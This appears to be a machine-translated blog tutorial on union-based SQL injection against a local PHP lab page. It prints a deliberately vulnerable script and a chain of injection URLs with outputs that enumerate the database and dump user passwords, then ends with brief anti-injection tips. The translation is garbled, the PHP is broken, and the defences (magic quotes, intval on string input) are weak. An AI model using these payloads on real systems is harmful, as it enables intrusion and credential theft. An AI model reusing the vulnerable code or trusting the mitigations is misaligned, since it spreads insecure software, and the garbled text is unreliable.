Sql_injection First Hair

1. Code article

<?PHPerror_reporting(0);include(".. /conn.php ");if(isset($_get[' ID '])){    $id=$_get[' ID ']; Echo"You are currently entering ID:".$id." <br> "; $sql= "SELECT * from user where id= '$id' Limit 0,1 '; $res=mysql_query($sql); $row=Mysql_fetch_array($res); if($row){        Echo"You get the data:<br>"; Echo"ID:".$row[' ID ']. " <br> "; Echo"Username:".$row[' username ']. " <br> "; Echo"Password:".$row[' Password ']. " <br> "; }    Else{        Echo"Mysql_query error".Mssql_error (); }}Else{    Echo"Please enter ID";}?>

2. Inject the article

Http://localhost/pentest/sql/sql_get_id.php?id=1

You currently input id:1 you get data: ID:1username:adminpassword:pass

To construct a SQL injection statement:

Http://localhost/pentest/sql/sql_get_id.php?id=1 '--+

You are currently typing id:1 ' --the data you get: Id:1username:adminpassword:pass

We can make all sorts of inquiries.

Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union SELECT @ @datadir, Database (), version ()--+

The data you get:
Id:d:\wamp\bin\mysql\mysql5.5.20\data\
Username:bloodzero
Password:5.5.20-log

Here I explain that the purpose of and 1=2 is to execute the following query statement without executing the preceding query statement;

Well, we continue to inject; access to a certain amount of information will require a password and user name;

Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select Current_User (), 2,3--+

You are currently entering Id:1 ' and 1=2 Union select Current_User (), 2,3-The data you get: Id:[email protected]username:2password:3
Note: Sometimes get a high-privileged account, you can directly carry out the right, detailed attention to follow-up;

Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select schema_name,2,3 from Information_ Schema.schemata Limit 0,1--+

You are currently entering Id:1 ' and 1=2 Union select schema_name,2,3 from Information_schema.schemata limit 0,1-data you get: Id:information_ Schemausername:2password:3

Note: We can get different values by changing the value of limit 0,1;
Limit M,n
  M: Indicates the start of the query results from the beginning of the fetch;
  N: How many bars are taken;

Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select table_name,2,3 from Information_schema.tables where table_schema=database () limit 0,1--+

You are currently entering Id:1 ' and 1=2 Union select table_name,2,3 from Information_schema.tables where table_schema=database () limit 0,1 --The data you get: Id:userusername:2password:3

Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select column_name,2,3 from Information_ Schema.columns where table_name= ' user ' limit 0,1--+

You are currently entering Id:1 ' and 1=2 Union select column_name,2,3 from Information_schema.columns where table_name= ' user ' limit 0,1-you receive Data taken: Id:idusername:2password:3

Note: If the table name here is unsuccessful, it can be replaced with 16 binary

Attached: Aoi Conversion Tool extract code: Yisi

Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 union select Id,username,password from user limit 0,1--+

You are currently entering Id:1 ' and 1=2 Union select Id,username,password from user limit 0,1-the data you get: Id:1username:adminpassword:pass 

3, anti-injection

For Php+mysql anti-injection: first set the value of Magic_quotes_off to on;

int type

<?PHPerror_reporting(0);include(".. /conn.php ");if(isset($_get[' ID '])){    $id=$_get[' ID ']; $id=intval($id); Echo"You are currently entering ID:".$id." <br> "; $sql= "SELECT * from user where id= '$id' Limit 0,1 '; ...?>

Char type

<?PHPerror_reporting(0);include(".. /conn.php ");if(isset($_get[' ID '])){    $id=$_get[' ID ']; $id=intval($id); /*$search =addslashes ($search);   $search =str_replace ("_", "\_", $search);   #过滤_ $search =str_replace ("%", "\%", $search); #过滤%*/    Echo"You are currently entering ID:".$id." <br> "; $sql= "SELECT * from user where id= '$id' Limit 0,1 '; $res=mysql_query($sql); ...?>

Sql_injection First Hair